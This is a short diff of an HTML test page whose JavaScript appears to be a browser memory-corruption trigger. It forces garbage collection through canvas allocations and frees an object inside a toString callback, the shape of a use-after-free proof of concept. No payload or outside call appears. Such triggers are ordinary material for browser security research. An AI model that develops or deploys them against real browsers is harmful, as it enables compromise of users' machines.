--- a/test1.html
+++ b/test1.html
@@ -6,7 +6,7 @@ function gc() {
         var gl = c.getContext("2d");
 
         for (var i = 0; i < 2; i++) {
-            var gggg = gl.createImageData(1, 0x1000)
+            var gggg = gl.createImageData(1, 0x10000)
         }
     } catch (e) {
 
@@ -16,14 +16,14 @@ function sleep(d){
   for(var t = Date.now();Date.now() - t <= d;);
 }
 
-var c = new Array(0x100000)
-var b = new XMLHttpRequest()
+var c = new Array(0x10000)
+var b = new Error();
 var a = [1,{toString:function(){
  a[2] = {};
  b = null
  //for(var i=0;i<0x10;i++){
  alert("before gc");
-// gc();
+ gc();
  alert("after gc");
  //}
  //sleep(1000)
